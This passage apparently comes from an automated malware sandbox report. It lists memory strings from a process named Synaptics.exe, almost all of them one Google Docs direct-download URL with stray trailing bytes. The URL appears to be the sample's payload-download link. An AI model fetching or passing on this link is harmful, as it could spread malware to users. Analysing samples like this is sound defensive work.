                              Source: Synaptics.exe, 00000014.00000002.2151463286.000000000EBC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOe
                              Source: Synaptics.exe, 00000003.00000002.1441338159.0000000000717000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1445445710.000000000720D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2018131759.0000000007EA3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976029257.0000000007EA3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.000000000073E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976493494.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017995324.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
                              Source: Synaptics.exe, 00000014.00000002.2152064699.000000000EC51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPRk
                              Source: Synaptics.exe, 00000003.00000002.1446731024.00000000072BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.00000000053D9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935661100.0000000004C7F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.0000000000787000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1977210353.0000000004C82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004C7C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                              Source: Synaptics.exe, 00000014.00000002.2140164000.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ.
                              Source: Synaptics.exe, 00000014.00000002.2145229675.0000000007E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQeK
                              Source: Synaptics.exe, 00000003.00000002.1446731024.00000000072BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1316708703.0000000005453000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2146834309.0000000007FF8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976684823.0000000004D36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
                              Source: Synaptics.exe, 00000014.00000002.2152064699.000000000EC51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR;
                              Source: Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRI
                              Source: Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004C60000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976684823.0000000004D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS1
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS?D
                              Source: Synaptics.exe, 00000014.00000002.2151463286.000000000EBC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSd
                              Source: Synaptics.exe, 00000003.00000002.1441338159.0000000000717000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935661100.0000000004C7F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2018131759.0000000007EA3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1977210353.0000000004C82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                              Source: Synaptics.exe, 00000014.00000002.2140164000.0000000000787000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTK
                              Source: Synaptics.exe, 00000014.00000002.2152064699.000000000EC51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTQo
                              Source: Synaptics.exe, 00000003.00000002.1445445710.000000000720D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.00000000053D9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1445445710.0000000007160000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU9N
                              Source: Synaptics.exe, 00000014.00000002.2145229675.0000000007E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUd
                              Source: Synaptics.exe, 00000003.00000002.1445445710.0000000007160000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976684823.0000000004CEE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2146834309.0000000007FF8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVQ
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004D22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVk&export=downloadHostdocs
                              Source: Synaptics.exe, 00000003.00000002.1445445710.000000000720D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1446731024.00000000072BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976493494.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017995324.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                              Source: Synaptics.exe, 00000003.00000003.1316708703.000000000543A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.0000000005442000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWP
                              Source: Synaptics.exe, 00000003.00000002.1445445710.000000000720D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.00000000053FE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935661100.0000000004C72000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX5
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX:M
                              Source: Synaptics.exe, 00000014.00000002.2152064699.000000000EC51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXP
                              Source: Synaptics.exe, 00000003.00000003.1316708703.000000000543A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.0000000005442000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXQ
                              Source: Synaptics.exe, 00000003.00000002.1446731024.00000000072BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004C60000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976684823.0000000004D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CE3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY/)
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CE3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYI
                              Source: Synaptics.exe, 00000003.00000002.1445445710.00000000071C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYY
                              Source: Synaptics.exe, 00000003.00000002.1446731024.00000000072BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976684823.0000000004CEE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZfSVl40
                              Source: Synaptics.exe, 00000003.00000002.1441338159.000000000063D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZr
                              Source: Synaptics.exe, 00000014.00000003.1976493494.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017995324.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_;H
                              Source: Synaptics.exe, 00000014.00000002.2151463286.000000000EBC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_f
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CF7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_o
                              Source: Synaptics.exe, 00000003.00000002.1443067594.00000000053D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada.ne
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada:r
                              Source: Synaptics.exe, 00000003.00000002.1443067594.0000000005481000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145229675.0000000007E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadag
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadager-3
                              Source: Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaic
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadalif
                              Source: Synaptics.exe, 00000014.00000002.2152064699.000000000EC6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadamad
                              Source: Synaptics.exe, 00000014.00000002.2140164000.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadapps.3
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CF7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadation
                              Source: Synaptics.exe, 00000003.00000002.1442781066.0000000004D5E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1447731711.00000000076FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1442543510.000000000478E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1445076712.00000000069AE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1448158191.0000000007E7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1445310013.0000000006EBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1445020863.000000000686E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1445196052.0000000006C2E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1446731024.00000000072BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1445423228.000000000713E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1442221240.0000000002ADE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1447862514.000000000797E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1445135665.0000000006AEE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1445367583.0000000006FFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1447924654.0000000007ABE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1442940964.000000000511E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1442723773.0000000004C1E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1444837747.00000000064EE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1442143184.000000000298D000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1447801991.000000000783E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1442886944.0000000004FDE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb9w
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CF7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbleco
                              Source: Synaptics.exe, 00000003.00000002.1445445710.0000000007160000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.000000000073E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CE3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc.o
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcFh
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcZUbq
                              Source: Synaptics.exe, 00000014.00000002.2151463286.000000000EBC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcfL
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FF8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976684823.0000000004D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadck.cn
                              Source: Synaptics.exe, 00000014.00000002.2140164000.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcl
                              Source: Synaptics.exe, 00000003.00000002.1443067594.0000000005481000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976684823.0000000004CF7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.c
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.c&
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.coq
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom.J
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom.t~
                              Source: Synaptics.exe, 00000003.00000002.1441338159.0000000000717000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadct
                              Source: Synaptics.exe, 00000003.00000002.1441338159.0000000000717000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2018131759.0000000007EA3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976029257.0000000007EA3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976493494.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017995324.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd0
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd;q
                              Source: Synaptics.exe, 00000014.00000002.2152064699.000000000EC51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddS_
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddV
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddn.de
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddown
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddroid
